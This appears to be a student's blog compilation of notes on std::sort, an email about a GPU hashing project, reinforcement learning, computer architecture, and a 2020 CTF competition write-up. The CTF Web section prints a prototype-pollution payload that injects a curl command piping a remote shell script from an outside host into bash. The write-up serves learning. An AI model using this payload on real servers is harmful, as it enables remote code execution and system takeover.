关于std::sort函数 开源可见的版本是否是跑的最快的版本。

https://godbolt.org/z/jxoYx7

我们可以很清楚的看到都是call 函数。我看到的源码有用intro sort 实现的gnu libcxx 也有分桶排序 的llvm 的版本,可是linux distro都是出厂自带,且每个公司都会对自己的代码进行魔改。今天被dhz的问题问到了,我还是cpp学艺不精。

zlw 曾经问过我一个问题。是std::sort 非常快,且看不到源码,这和我看到的好像不太一致,我从来没调试过glibc 和libcxx.so 源码和自带的不一样,谁知道呢?

如果glibc可以插一些奇怪的东西,那就太棒了。

linux team's motto: make our guest quicker

Parallel Computing Final Project FineTunedHashML Spring 2020

The final repo is stored at gitlab, added some hash function to the original algorithm.

Dear Professor,
I’m Yiwei Victor Yang 2018533218 from your parallel computing class.
My teammate and I are struggling in selecting the project. I proposed to set up a projects transplant of a CPU LSH-Deep learning (https://github.com/keroro824/HashingDeepLearning/tree/master/SLIDE), which is a technique newly proposed by Rice University and Intel co, ltd to utilize the avx512 instruction set and huge pages intrinsic in locality sensitive hashing which is the main overhead of the project. ( https://arxiv.org/pdf/1903.03129.pdf)

SLIDE is a project to reimplement BP on the CPU. After the LSH pre-processing, the paper proposed to utilize maximum inner product search (MIPS) which mainly do the Sparse matrix operations- Sparse Backpropagation or Gradient Update.

After the update of weight stored in CSR format Spmv, the paper do the Batch computing by OpenMP.

As research in the paper, we can see that the main overhead is pre-processing on CPU avx512 with huge pages cache-heap optimization on, which gained around 30% faster than the raw GPU Tesla V100. If we transplant that part(dynamic hashing) in GPU which is said not applicable by the author from intel, I think it may have a 50 percent chance to be faster than the current CPU version.
As the paper’s reference paper puts it: it gains something like 2 times faster after porting to Cuda, which triggers conflicts. https://github.com/src-d/minhashcuda

Our proposal is to make a comparison amid the raw Tensorflow on GPU, SLIDE on avx512, and SLIDE on GPU using the dataset mentioned in the paper.

My question is whether the transplant of the CPU dynamic cuckoo in the SLIDE do you think can have real speed up than the original version and if we attempted to transplant the program and get little speed up, will we eventually get the score?

Thanks a lot!

[RL] Monte-Carlo Methods

Monte-Carlo RL

  1. MC learn directly from episodes of experience.
  2. MC is model-free. No knowledge of MDP transitions or rewraeds.
  3. MC learns fro complete episodes. no bootstrapping
    1. Here Bootstrapping means Using one or more estimated values in the update step fro the same kind of estimated value.. like in \(SARSA(\lambda)\) or \(Q(\lambda)\)
    2. The single-step TD is to utilize the bootstrap by using a mix of results from different length trajectories.
  4. MC uses the simplest possible idea: value = mean return
  5. 2 ways:
    1. model-free: no model necessary and still attains optimality
    2. Simulated: needs only a simulation, not a full model
  6. Caveat: can only apply MC to episodic MDPs
    1. All episodes must terminate

policy evaluation

The goal is to learn \(v_\pi\) from episodes of experience under policy \(\pi\)
\[S_1,A_1,R_2,....S_k \sim 1\]
and the return is the total discounted reward: \(G_t=R_{t+1}+\gamma R_{t+2}+...\gamma ^{T-1}T_T\).

The value function is the expected return : \(v_\pi(x)=\mathbb{E}_{\pi}[G_t~S_t=s]\)
P.S. This policy use empirical mean rather than expected return.

By different visits during an episode, they can be diverged into Every-Visit and First-visit, and both converge asymptotically.

First-visit

proof of convergence


In fact it's the "backward mean \(\frac{S(s)}{N(s)}\)" to update \(V(s)\)

blackjack (21 points)

In Sutton's book, we get the exploration graph like

Every-Visit Monte-Carlo Policy Evaluation

the difference is every visits.

Incremental Mean

The mean \(\mu_1,\mu_2.... \) of the sequent can be computed incrementally by

incremental MC-updates

Monte-Carlo Estimation of Action Values

Backup Diagram for Monte-Carlo

Similar to Bandit, is to find optimal from the explore/exploit dilemma the entire rest of episode included. and the only choice considered is at each state and doesn't bootstrap.(unlike DP).

Time required to estimate one state does not depend onthe total number of states

Temporal-Difference Learning

Bootstrapping

Saying: To lift one up, strap the boot of sb. again and again which is incompletable.

Modern definition: re-sampling technique from the same sample again and again which has the statistical meaning.

intro

  1. TD methods learn directly from episodes of experience
  2. TD is model-free:no knowledge of MDP transitions/rewards
  3. TD learns from incomplete episodes, by bootstrapping
  4. TD updates a guess towards a guess

\((number)\) the number represent the look ahead times.

driving home example

TD is more flexible for MC have to wait for the final result for the update. On policy vs. off policy.




MC make a nearest prediction


We actually can generate the estimated MDP graph and corresponding example for AB example.

Comparison

  1. TD can learn before knowing the final outcome
    1. TD can learn online after every step (less memory & peak computation)
    2. MC must wait until end of episode before return is known
  2. TD can learn without the final outcome
    1. TD can learn from incomplete sequences
    2. MC can only learn from complete sequences
    3. TD works in continuing (non-terminating) environments
    4. MC only works for episodic (terminating) environment
      ### result is TD performs better in random walk


batch MC and TD

add step parameter \(\alpha\)

Unified comparison

\(\to\)

  • Bootstrapping: update involves an estimate
    • MC does not bootstrap
    • DP bootstraps
    • TD bootstraps
  • Sampling:update samples an expectation
    • MC samples
    • DP does not sample
    • TD samples

n-step TD

⁃   $

\begin{array}{l}\text { n-Step Return } \ \qquad \begin{aligned} \text { Consider the following } n \text { -step returns for } n=1,2, \infty \ \qquad \begin{aligned} n=1 &(T D) & \frac{G_{t}{(1)}}{G_{t}{(2)}}=\frac{R_{t+1}+\gamma V\left(S_{t+1}\right)}{R_{t+1}+\gamma R_{t+2}+\gamma{2} V\left(S_{t+2}\right)} \ & \vdots \end{aligned} \ \qquad n=\infty \quad(M C) \quad G_{t}{(\infty)}=R_{t+1}+\gamma R_{t+2}+\ldots \gamma{T-1} R_{T} \end{aligned} \ \text { - Define the } n \text { -step return } \ \qquad \underbrace{G_{t}{(n)}=R_{t+1}+\gamma R_{t+2}+\ldots+\gamma{n-1} R_{t+n}+\gamma{n} V\left(S_{t+n}\right)}_{The\ General\ case}\ \text { - n} \text { -step temporal-difference learning } \ \qquad V\left(S_{t}\right) \leftarrow V\left(S_{t}\right)+\alpha\left(G_{t}{(n)}-V\left(S_{t}\right)\right)\end{array}
$$

Reference

  1. What exactly is bootstrapping in reinforcement learning?
  2. First-visit Monte Carlo policy from WSU

Reflection on our 2020 Wang Ding CTF contest

Result

image-20200510230838571

The sunshine will eventually come without doubt tomorrow!

Misc

qiandao

Get the robots.txt from the nginx website and get the destination.

image-20200510231822195

Play the game with gourgeous names in the CTF conf.

image-20200510231813046

Flag in "F12"

image-20200510231804937

Reverse

signal

credit: https://bbs.pediy.com/thread-259429.htm

image-20200510232648046

not happy, it's a vm inside. From vm_operad, we have

image-20200510232802184

image-20200510232837945

The key is case7, we can apply the diction on a1[v10+1] to figure out what happens. So, up the OD.

Appling the table

int table[] = { 0x0A, 4, 0x10, 3, 5, 1, 4, 0x20, 8, 5, 3, 1, 3, 2, 0x8, 0x0B, 1, 0x0C, 8, 4, 4, 1, 5, 3, 8, 3, 0x21, 1, 0x0B, 8, 0x0B, 1, 4, 9, 8, 3, 0x20, 1, 2, 0x51, 8, 4, 0x24, 1, 0x0C, 8, 0x0B, 1, 5, 2, 8, 2, 0x25, 1, 2, 0x36, 8, 4, 0x41, 1, 2, 0x20, 8, 5, 1, 1, 5, 3, 8, 2, 0x25, 1, 4, 9, 8, 3,0x20, 1, 2, 0x41,8, 0x0C, 1, 7,0x22, 7, 0x3F, 7,0x34, 7, 0x32, 7,0x72, 7, 0x33, 7,0x18, 7, 0xA7, 0xFF, 0xFF, 0xFF, 7,0x31, 7, 0xF1, 0xFF, 0xFF,0xFF, 7, 0x28, 7, 0x84, 0xFF,0xFF, 0xFF, 7, 0xC1, 0xFF, 0xFF, 0xFF, 7,0x1E, 7, 0x7A };

We discover the value of a1[v10+1] stays the same.

We can deduct that case 8's to read the user's input, and make the handler as the vector handler in the OS.

the handler can be enumerated as

10h ^ v8[1]-5 = 22h
(20h ^v8[2])*3=3Fh
v8[3]-2-1=34h
(v8[4]+1 )^4 =32 h
v8[5]*3-21h=72h
v8[6]-1-1=33h
9^v8[7]-20=18
(51h +v8[8])^24h=FA7
v8[9]+1-1=31h
2*v8[10]+25h=F1h
(36h+v8[11]) ^41h =28h
(20h + v8[12])*1=F84h
3*v8[13]+25h=C1h
9^v8[14]-20h=1E h
41h + v8[15] +1 =7A h

Eventually we get the total flag{757515121f3d478}.

Web

Notes

image-20200510231219939

get the webshell from the logic in the js.

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

Apply the "中国菜刀" payloads id=__proto__.abc&author=curl%20http://gem-love.com:12390/shell.txt|bash&raw=a in the undefsafe.

get the code from /var/html/code/flag

flag{ 8c46c34a-fa1f-4fc9- 81bd- 609b1aafff8a }

Crypto

boom

image-20200510231932335

just play a simple game

image-20200510231952896

md5:en5oy

image-20200510232016920

stupid z=31,y=68, x=74

image-20200510232038249

stupid Mathemetica.

image-20200510232104887

You Raise Me up

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

What you need to do is to calculate the \(m^f\equiv c\ mod\ n\)

\(n\) is actually $2^512$.

just another Modular arithmetic like "点鞭炮", which can be searched on stackoverflow.

Reflection

We have to practice more and collaborate more!

[RL] RL Category

Following the wikipeadia

Reinforcement Learning is an area of machihne learning inspired by behavioral psychology, concerned with how software agents ought to take actions in an environment so as to maximzie some notion of cumulative reward.

image-20200412150622271

Behavioral Psychology

Behavior is primarily shaped by reinforcement rather than free-will.

  • behaviors that result in praise/pleasure tend to repeat
  • behaviors that result in punishment/pain tend to become extinct

agent

An entity (learner & decision maker) that is equipped with Sensors end-effectors and goals

image-20200412145820170

Action

  • Used by the agent to interact with the environment.
  • May have many di↵erent temporal granularities and abstractions

image-20200412145849260

reward

A reward R**t is a scalar feedback signal

Indicates how well agent is doing at step t

The agent’s job is to maximize cumulative reward

hypothesis: All goals can be described by the maximization of expected cumulative reward

image-20200412150016842

Main Topics of Reinforcement Learning

Learning: by trial and error

Planning: search, reason, thought, cognition

Prediction: evaluation functions, knowledge

Control: action selection, decision making

Dynamics: how the state changes given the actions of the agent

Model-based RL

  • dynamics are known or are estimated
  • solving RL problems that use models and planning

Model-free RL

  • unknown dynamics
  • explicitly trial-and-error learners

not necessarily iid

image-20200412150553154

P.S. 逆强化学习。

Summary

image-20200412151935910

[Computer Architecture] superscalar

Greater Instruction-Level Parallelism (ILP)

  • Multiple issue “superscalar”
    • Replicate pipeline stages ⇒ multiple pipelines
    • Start multiple instructions per clock cycle – CPI < 1, so use Instructions Per Cycle (IPC)
    • E.g., 4GHz 4-way multiple-issue
      • 16 BIPS, peak CPI = 0.25, peak IPC = 4
    • But dependencies reduce this in practic
  • “Out-of-Order” execution
    • Reorder instructions dynamically in hardware to reduce impact of hazards
  • Hyper-threading

Pipelining recap

image-20200409104529546

image-20200409104719616

image-20200409104748552

pipelines complexities exlained

GPRs FPRs

  • More than one Functional Unit
  • Floating point execution!
    • Fadd & Fmul: fixed number of cycles; > 1
    • Fdiv: unknown number of cycles!
  • Memory access: on Cache miss unknown number of cycles
  • Issue: Assign instruction to functional unit

image-20200410165203353
image-20200410165333359

summary

image-20200409104937513

Some static multiple issues

VLIW: very long instruction word

image-20200410165502554

The solution can be easily found

image-20200409143437506

image-20200409144123473

Quiz

[ ] A. In-order processors have a CPI >=1

[x] B. more stages allow a higher clock frequency

[x] D. OoO pipleines need speculation

[ ] E. superscalar processor can execute

[Computer Architecture] data path

intro - where are we now?

image-20200331101915459

the cpu

Processor - datapath - control

cenario in RISC-V machine

image-20200331102713392

The datapath and control

image-20200331120145444
image-20200331120240686

Overview

  • problem: single monolithic bloc
  • solution: break up the process of excuting an instruction into stages
    • smaller stages are easier to design –
    • easy to optimize &modularity

five stages

image-20200331102935318

  • Instruction Fetch
    • pc+=4
    • take full use of mem hierarchy
  • Instruction Decode
  • read the opcode to determine instruction type and field lengths
  • second, (at the same time!) read in data from all necessary registers
    • for add, read two registers
    • for addi, read one register
  • third, generate the immediates
  • ALU
    • the real work of most instructions is done here: arithmetic (+, -, *, /), shifting, logic (&, |)
    • For instance, it's load and store
      • lw t0, 40(t1)
      • the address we are accessing in memory = the value in t1 PLUS the value 40
      • so we do this addition in this stage
  • Mem access
    • Actually only the load and store instruction do anything during this stage.
    • it's fast but unavoidable
  • Register write
    • write the result of some computation into a register.
    • for stores and brances idle

      misc

      image-20200331200948199

    image-20200331104008311

    memory alignment

    image-20200331201039177

data path elements state and sequencing

register

image-20200331112454437

instruction level

add

image-20200331105222087image-20200331105422860

image-20200331110018593

time diagram for add

image-20200331111255018

addi

image-20200331120334870

lw

image-20200331202936147

image-20200331203002110

sw - critical path

image-20200331203121826

image-20200331120529637

combined I+S Immediate generation

image-20200331203242961

branches

image-20200331120922178

image-20200331112154728

image-20200331114914251

pipelining

image-20200331120724483

summary

image-20200331180540752

quiz

image-20200331181726584

for D

image-20200331181714589image-20200331181804796image-20200331181819265

for E

image-20200331182129638

CS 150 is composed of the TsingHua's 计算机组成原理 and VSLI

CS 150 is composed of the TsingHua's 计算机组成原理 and VSLI

source:http://www-inst.eecs.berkeley.edu/~cs150/sp13/agenda/

image-20200326172234625

They studied verilog

FSM is really similar to our homework. actually, I found that their exams is given to us for homework.

P.S.: WHY they have spring break?image-20200326172618489

image-20200326172816315

run a linux on FPGA. and implement a CPU. 俗称“造机”。

If I have time, I'll implement the CPU by my own.

GPU applying the RISC-V architecture will be much better and cooler.

The more I read and learn , the more I found the knowledge in the EECS category can be nicely cascaded. In most of the cases, we get the point from another place and we can be taught within minutes.

After talking with upperclassman 罗浩聪, I guadully find my career as an PhD in Arch or PL, or sth, in between. But for now, let me finish the 2 cooperate papers.

[Computer Architecture] Circuit

intro

image-20200325123544978

synchronous digital systems

Hardware of a processor should be synchronous and digital

The hardware layer of abstraction

image-20200325123706861

switches

image-20200325123737670

arrow shows action if wire changes to 1 or is asserted.

and & or

image-20200325123840940

Transistors

High voltage$V_{dd}$ Low voltage \(Gnd\)

PWD

we implement switches using CMOS

CMOS Transistor Networkimage-20200325124156574

image-20200325124245875vsimage-20200325124301345

note PWD

material:image-20200325124415901

how MOSFET Operation

image-20200325124509056
image-20200325124827736

CMOS Networks

2 input network

image-20200325141011777

combined logit symbols

image-20200325141058284

example debugging waveform

image-20200325140800590
image-20200325140219499

types of circuits

CL

SL

image-20200325140345618

example using time chart

image-20200325140122110
image-20200325140122110

[Computer Architechture] call

Language Execution continuum

An interpreter is a program that executes other programs.

  1. langurage translation gives us another option
  2. In genreral, we interpret a high-level language to a lower-level language to increase preformance

image-20200320143508476

interpretation

  1. Python
  2. asm

Assembler directives

image-20200320143656584

pseudo-instruction replacement

image-20200320143736406

what's tail's about
{...
 lots of code
 return foo(y);
}
  • it's recursive call to foo() if this is within foo(), or call to a different function...
  • for effictiency
    • Evaluate the arguments for foo() in a0-a7
    • return ra, all callee saved registers and sp
    • Then call foo() with j or tail
  • when foo() returns, it can return directly to where it needs to return to
    • Rather than returning to wherever foo() was called and returning from there
    • Tail call optimization

branches

image-20200320144520209

Linking progress

image-20200320150133861

image-20200320150156550

Four types of Address

PC- relative addredding (beq)

Absolute addresses in RISC-V

image-20200320150357128

Loading process

image-20200320150929601